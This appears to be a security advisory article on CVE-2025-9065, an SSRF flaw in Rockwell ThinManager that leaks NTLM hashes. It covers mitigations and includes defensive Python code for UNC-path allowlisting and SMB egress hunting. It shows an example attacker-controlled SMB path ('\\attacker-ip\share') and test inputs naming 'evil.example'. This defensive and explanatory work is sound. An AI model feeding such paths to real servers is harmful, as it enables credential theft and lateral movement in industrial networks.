The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reissued a high-severity advisory on September 9, 2025, for a server-side request forgery (SSRF) vulnerability in Rockwell Automation’s ThinManager. Tracked as CVE-2025-9065 and scored 8.6 under CVSS v4, the flaw lets authenticated attackers extract the NTLM hash of the ThinServer service account by feeding it a malicious SMB path. That hash can then be cracked offline or used in pass-the-hash and relay attacks to move laterally across both IT and operational technology (OT) networks. Rockwell fixed the issue in ThinManager 14.1, but for many industrial environments the real challenge lies in balancing urgent patching with the strict change-control processes that govern production floors.
ThinManager’s Critical Role in OT Networks
ThinManager is a widely used thin-client management platform in manufacturing, utilities, and other critical infrastructure sectors. It brokers sessions for operator workstations, manages remote terminals, and often runs with elevated privileges that grant the ThinServer service account broad access to industrial control system (ICS) resources. Any weakness in such software immediately becomes a high-stakes concern because a compromised service account can give attackers a foothold into sensitive control networks.
The service account’s NTLM hash is a particularly valuable target. NTLM, Microsoft’s legacy authentication protocol, remains pervasive in industrial environments where Kerberos may not be fully deployed or where legacy applications and devices require it. Once a hash is captured, adversaries can attempt offline cracking to recover the plaintext password or perform relay attacks to authenticate to other servers without needing the password at all.
How the SSRF Exploit Works
The vulnerability stems from insufficient input sanitization when ThinManager processes SMB paths. An authenticated user—someone who already has valid credentials to access the ThinManager management interface—can craft an SMB path pointing to an attacker-controlled server. When ThinServer attempts to connect to that path, the Windows SMB client automatically attempts NTLM authentication, leaking a challenge/response hash to the attacker’s endpoint.
This is a classic SSRF pattern adapted to the SMB protocol. The high-level attack flow is straightforward:
- An attacker with access to ThinManager’s configuration panel submits a specially crafted SMB path (e.g., \\attacker-ip\share).
- ThinServer resolves the path and initiates an outbound SMB connection. During the protocol handshake, it sends an NTLM authentication request.
- The attacker’s rogue SMB server captures the NTLM hash and either cracks it offline or relays it to a legitimate target to impersonate the service account.
- With the harvested credentials, the attacker can pivot to file servers, domain controllers, or other ICS components that trust the service account.
CISA’s advisory confirms that the vulnerability requires authenticated access, but in many OT installations the ThinManager interface is accessible to a wide pool of internal users—operators, engineers, and maintenance staff—any of whom could become a threat if their own credentials are stolen or if an insider turns malicious.
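The root cause described above is a path that is accepted and dereferenced without checking where it points. The following is an added example, not code from Rockwell, CISA or ThinManager, of the defensive counterpart: a UNC path validator that only lets a service open shares on an explicitly allowlisted set of internal file servers. The hostnames in ALLOWED_SMB_HOSTS are constructed placeholders, and the validator also covers forms a naive check often misses (forward-slash paths, the long \\?\UNC\ prefix, IP literals, and host components carrying an @ or : suffix).

```python
import ipaddress
import re
from typing import Optional

# Constructed allowlist standing in for whatever source of truth the site keeps
# (a config file, an inventory export). Only these hosts may be dereferenced.
ALLOWED_SMB_HOSTS = {"fileserver01.plant.example", "nas02.plant.example"}

# Matches \\host\share[\rest] and the long form \\?\UNC\host\share[\rest].
_UNC_RE = re.compile(r"^\\\\(\?\\UNC\\)?([^\\]+)\\([^\\]+)(\\.*)?$")


class UncPathError(ValueError):
    """Raised when a path is malformed or points outside the allowlist."""


def _is_ip_literal(host: str) -> bool:
    """True for dotted/colon IP literals and Windows' host.ipv6-literal.net form."""
    if host.endswith(".ipv6-literal.net"):
        return True
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def validate_unc_path(path: str, allowed_hosts=ALLOWED_SMB_HOSTS) -> str:
    """Return the canonical \\\\host\\share\\... form, or raise UncPathError."""
    # Windows accepts '/' as a separator too, so normalise before matching.
    norm = path.replace("/", "\\")
    m = _UNC_RE.match(norm)
    if not m:
        raise UncPathError("not a \\\\host\\share UNC path")
    host, share, rest = m.group(2), m.group(3), m.group(4) or ""
    # '@' and ':' in the host component select alternate transports or ports
    # (WebDAV-style host@SSL@443); nothing on the allowlist needs them.
    if "@" in host or ":" in host:
        raise UncPathError("host component contains '@' or ':'")
    # Names are easier to audit than addresses; an IP literal is also the usual
    # shape of an arbitrary, attacker-chosen destination.
    if _is_ip_literal(host):
        raise UncPathError("IP literals are not permitted; use an allowlisted name")
    host = host.rstrip(".").lower()
    if host not in allowed_hosts:
        raise UncPathError(f"host {host!r} is not an allowlisted SMB server")
    return f"\\\\{host}\\{share}{rest}"


def is_allowed_unc_path(path: str) -> bool:
    """Boolean convenience wrapper around validate_unc_path."""
    try:
        validate_unc_path(path)
        return True
    except UncPathError:
        return False


if __name__ == "__main__":
    for candidate in [r"\\fileserver01.plant.example\configs",
                      r"\\?\UNC\nas02.plant.example\backups\daily",
                      r"\\203.0.113.5\share",
                      "//evil.example/share"]:
        print(f"{candidate!r}: {'allowed' if is_allowed_unc_path(candidate) else 'rejected'}")
```

The design choice worth noting is that the check is an allowlist of names, not a denylist of bad patterns: any host the operators have not explicitly approved is rejected, which is the only posture that holds up when the attacker controls the input.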
Affected Versions and the Patch
Rockwell Automation has acknowledged the issue and released ThinManager version 14.1 to address CVE-2025-9065. All releases in the 13.x and 14.0 branches are vulnerable. The vendor and CISA both strongly recommend upgrading to 14.1 or newer as the primary remediation.
For OT teams, however, the “patch immediately” directive collides with reality. ThinManager often integrates tightly with supervisory control and data acquisition (SCADA) systems, programmable logic controllers (PLCs), and other mission-critical equipment. An untested update could disrupt production, so change management requires weeks of staging, validation, and maintenance-window scheduling. During that gap, compensating controls become essential.
Defensive Layers Beyond the Patch
Organizations that cannot upgrade immediately should implement a series of mitigations to break the attack chain:
Block Outbound SMB
Use firewalls to deny all SMB traffic (TCP 445) and NetBIOS (TCP/UDP 139) from ThinManager servers to anything other than explicitly trusted internal SMB servers. Disallow egress to the internet or to untrusted segments entirely.
Harden NTLM on Clients
On supported Windows systems, enable Group Policy to block NTLM authentication for outbound SMB connections. The policy setting Computer Configuration > Administrative Templates > Network > Lanman Workstation > Block NTLM (LM, NTLM, NTLMv2) can be set to Enabled. For legacy servers that still require NTLM, maintain a carefully audited exception list.
Enforce SMB Signing and Kerberos
SMB signing prevents tampering and some relay attacks, while Kerberos-based authentication is not vulnerable to simple hash replay. Audit your environment for Kerberos capability and enable it wherever possible, using SMB signing as a fallback for endpoints that cannot yet make the switch.
Rotate Service Account Credentials
After patching—or immediately if compromise is suspected—rotate the ThinServer service account password. If NTLM hashes may have been harvested, create an entirely new service account and retire the old one. Managed Service Accounts (MSAs) can further reduce credential exposure.
Limit Network Exposure
Restrict access to ThinManager’s management port (TCP 2031) to only those IP addresses and subnets that require it. Apply industrial firewalls and jump hosts; never expose the management interface directly to the internet.
Least Privilege for the Service Account
Audit the ThinServer account’s rights and strip away any unnecessary permissions. It should never hold domain admin privileges or broad file-share access.
Detection and Incident Response
Even with defenses in place, security teams should hunt for signs of exploitation:
- Outbound SMB connections from ThinManager servers to unexpected IP addresses (especially public IPs or known malicious infrastructure).
- NTLM authentication attempts sourced from the ThinServer host but targeting external or suspicious endpoints.
- Anomalous SMB session establishments to any host not in a predefined allowlist.
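The three hunting signals above all reduce to one question: did a ThinManager host open SMB to a destination it has no business talking to? As an added example (not tooling from Rockwell or CISA), here is that logic run over a handful of constructed flow records. The record format, the ThinServer address, the allowlisted file servers and the internal address range are all assumptions; a real deployment would feed it firewall or NetFlow exports in whatever shape the site's collector produces.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Constructed assumptions about the site.
THINMANAGER_HOSTS = {"10.20.30.5"}                     # the ThinServer host(s)
ALLOWED_SMB_SERVERS = {"10.20.40.10", "10.20.40.11"}   # file servers it may reach
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # the plant's own address space
SMB_PORTS = {445, 139}

# Constructed flow records: "timestamp,src_ip,dst_ip,dst_port,proto".
SAMPLE_FLOWS = """\
2025-09-10T08:01:12Z,10.20.30.5,10.20.40.10,445,tcp
2025-09-10T08:02:45Z,10.20.30.5,203.0.113.77,445,tcp
2025-09-10T08:03:10Z,10.20.30.5,10.20.99.8,139,tcp
2025-09-10T08:03:30Z,10.20.30.5,10.20.40.11,3389,tcp
2025-09-10T08:04:02Z,10.20.31.7,203.0.113.77,445,tcp
2025-09-10T08:05:00Z,10.20.30.5,10.20.40.11,445,tcp
"""


@dataclass
class Finding:
    timestamp: str
    src_ip: str
    dst_ip: str
    dst_port: int
    reason: str


def classify_smb_destination(dst_ip: str) -> Optional[str]:
    """Return a reason string if dst_ip is a suspicious SMB target, else None."""
    if dst_ip in ALLOWED_SMB_SERVERS:
        return None
    addr = ipaddress.ip_address(dst_ip)
    if not any(addr in net for net in INTERNAL_NETS):
        return "outbound SMB to address outside the plant network"
    return "outbound SMB to internal host not on the allowlist"


def hunt_smb_egress(flow_text: str) -> List[Finding]:
    """Flag SMB/NetBIOS flows from ThinManager hosts to non-allowlisted destinations."""
    findings: List[Finding] = []
    for line in flow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, port, _proto = line.split(",")
        dst_port = int(port)
        # Only ThinManager-originated SMB or NetBIOS sessions are in scope here.
        if src not in THINMANAGER_HOSTS or dst_port not in SMB_PORTS:
            continue
        reason = classify_smb_destination(dst)
        if reason is not None:
            findings.append(Finding(ts, src, dst, dst_port, reason))
    return findings


if __name__ == "__main__":
    for f in hunt_smb_egress(SAMPLE_FLOWS):
        print(f"{f.timestamp} {f.src_ip} -> {f.dst_ip}:{f.dst_port}  {f.reason}")
```

Run against the sample, only the 203.0.113.77 and 10.20.99.8 flows are reported: the first because it leaves the plant address space entirely, the second because an internal host that is not an approved file server is exactly the lateral-movement case the advisory warns about. The RDP flow and the flow from the non-ThinManager host are ignored by design.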
If evidence of credential theft surfaces, isolate the affected ThinServer host immediately. Preserve memory dumps, local logs, and network flows. Rotate the service account password—and any other credentials that may have been exposed—and then comb through domain controller and file-server logs for lateral movement attempts. Treat the incident as a potential OT compromise and follow established escalation procedures.
Operational Considerations for the Upgrade
Testing ThinManager 14.1 in a lab that mirrors production is non-negotiable. Validate that thin-client sessions, camera integrations, Remote Desktop Services (RDS) connections, and FactoryTalk integrations work as expected. Check for hard-coded SMB behavior that may rely on older authentication methods; if found, prepare exception lists and document them.
If you enable SMB NTLM blocking, stage the change gradually. Begin with a pilot group of servers, monitor for failures, and expand only after confirming stability. Keep the allowlist for essential legacy systems under strict review.
Long-Term Strategy: Moving Beyond NTLM
CVE-2025-9065 is a symptom of a broader architectural debt in OT networks: reliance on a single, highly privileged service account and a legacy authentication protocol. The fix isn’t just a patch—it’s a shift in identity and access management. Over time, organizations should:
- Migrate service accounts to Group Managed Service Accounts (gMSAs) where possible.
- Decommission NTLM in favor of Kerberos, using SMB signing only where NTLM cannot yet be eliminated.
- Segment OT networks rigorously, using zero-trust principles that assume any internal host can be compromised.
- Adopt regular vulnerability scanning and a predictable patching cadence, even for industrial software.
Bottom Line
CVE-2025-9065 turns a configuration parameter into a credential-exfiltration channel, and in OT environments that can quickly escalate from a single stolen hash to full domain compromise. Rockwell’s release of ThinManager 14.1 closes the door on the vulnerability itself, but during the window when thousands of organizations are still testing the update, the layered defenses outlined here are not optional—they are the only thing standing between a vulnerable server and a determined attacker. Patch aggressively, but lock down your network and monitor relentlessly while you do.